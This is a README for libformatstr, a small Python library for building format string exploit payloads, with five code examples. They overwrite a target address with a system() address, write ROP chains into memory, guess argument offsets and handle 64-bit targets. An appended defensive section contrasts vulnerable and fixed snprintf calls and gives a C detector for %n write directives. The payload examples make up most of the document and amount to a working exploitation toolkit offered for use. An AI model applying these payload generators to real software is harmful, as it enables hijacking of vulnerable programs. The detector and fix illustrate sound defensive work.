Simplify format string exploitation.
Latest commit 71f9ac6 (Jul 10, 2017): hellman merged pull request #8 from unamer/master, "Fix some errors in 64bit mode".

Small script to simplify format string exploitation.


  • Case 1 - replace one dword:

```python
import sys
from libformatstr import FormatStr

addr = 0x08049580
system_addr = 0x080489a3

p = FormatStr()
p[addr] = system_addr

# buf is the 14th argument, 4 bytes are already printed
sys.stdout.write(p.payload(14, start_len=4))
```
  • Case 2 - put ROP code somewhere:

```python
import sys
from libformatstr import FormatStr

addr = 0x08049580
rop = [0x080487af, 0x0804873c, 0x080488de]
p = FormatStr()
p[addr] = rop

sys.stdout.write(p.payload(14))
```
  • Case 3 - guess argument number and padding:

```python
import sys
from libformatstr import FormatStr, make_pattern, guess_argnum

# let's say we have a do_fmt function (yours to supply, not part of the library),
# which gives us only the output of the format string
# (you can also just copy fmtstr and the output manually)

buf_size = 250  # fix buf_size to avoid offset variation
res = do_fmt(make_pattern(buf_size))
argnum, padding = guess_argnum(res, buf_size)

# of course you can use it in payload generation

p = FormatStr(buf_size)
p[0xbffffe70] = "\x70\xfe\xff\xbf\xeb\xfe"  # yes, you can also put strings

sys.stdout.write(p.payload(argnum, padding, 3))  # we know 3 bytes were printed already
```
  • Case 4 - write something in a specified order:

```python
import sys
from libformatstr import FormatStr

f = FormatStr(autosort=False)  # this option disables auto sorting
# With autosort off, writes are emitted in the order they were added.
# The values on the right are placeholders for illustration.
f[0x1234] = 0x11
f[0x5678] = 0x22
f[0xabcd] = 0x33

# The payload will write address 0x1234 first, then 0x5678, then 0xabcd.
sys.stdout.write(f.payload(14))
```
  • Case 5 - while you are in amd64:

```python
from libformatstr import FormatStr

f = FormatStr(isx64=1)  # this option forces the script to use 64-bit addresses while generating the payload
```
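For readers on the defending side, here is the bug class that every payload above depends on, shown as the vulnerable call beside its fixed form, plus a small check for the memory-writing directives (`%n` with optional `N$` selector and `h`/`hh` length modifiers) that such payloads are built from. This is an added example and not part of libformatstr; `log_message_vulnerable`, `log_message_safe` and `count_write_directives` are names chosen for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: attacker-controlled text is passed as the *format*
 * argument, so "%x" leaks stack words and "%n" writes to memory.
 * Kept here for contrast only and never called on untrusted data.
 * The pragma silences -Wformat-security, which rightly flags this call;
 * real code should let that warning fail the build instead. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
static int log_message_vulnerable(char *out, size_t outsz, const char *user_text)
{
    return snprintf(out, outsz, user_text);   /* format string == untrusted input */
}
#pragma GCC diagnostic pop

/* Fixed form: the format is a constant and the user text is consumed by %s,
 * so any '%' sequences it contains are copied as inert bytes. */
static int log_message_safe(char *out, size_t outsz, const char *user_text)
{
    return snprintf(out, outsz, "%s", user_text);
}

/* Defensive check for untrusted input: count conversion directives that
 * write memory ("%n", "%hn", "%hhn", "%12$hhn", ...). A non-zero count in
 * data that is about to reach a printf-family call is worth alerting on.
 * "%%" is a literal percent sign and is skipped. */
static int count_write_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; (p = strchr(p, '%')) != NULL; p++) {
        const char *q = p + 1;
        if (*q == '%') {                 /* literal "%%" */
            p = q;
            continue;
        }
        while (*q >= '0' && *q <= '9')   /* width, or N in a POSIX "N$" selector */
            q++;
        if (*q == '$')
            q++;
        while (*q == 'h' || *q == 'l' || *q == 'q' || *q == 'L')   /* length modifiers */
            q++;
        if (*q == 'n')
            count++;
    }
    return count;
}

int main(void)
{
    /* Constructed sample in the shape libformatstr emits: two 1-byte writes
     * via direct-parameter-access %hhn directives. */
    const char *sample = "AAAA%12$hhn%13$hhn";
    char out[64];

    log_message_safe(out, sizeof out, sample);
    printf("safe output  : %s\n", out);                 /* directives stay literal */
    printf("%%n directives: %d\n", count_write_directives(sample));
    (void)log_message_vulnerable;                        /* shown, deliberately not run */
    return 0;
}
```

Compiling with `-Wformat -Wformat-security` (and `-Werror=format-security` in CI) catches the vulnerable form at build time; the runtime count is for places where input is logged or proxied before it reaches code you do not control.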


Author: hellman

License: MIT License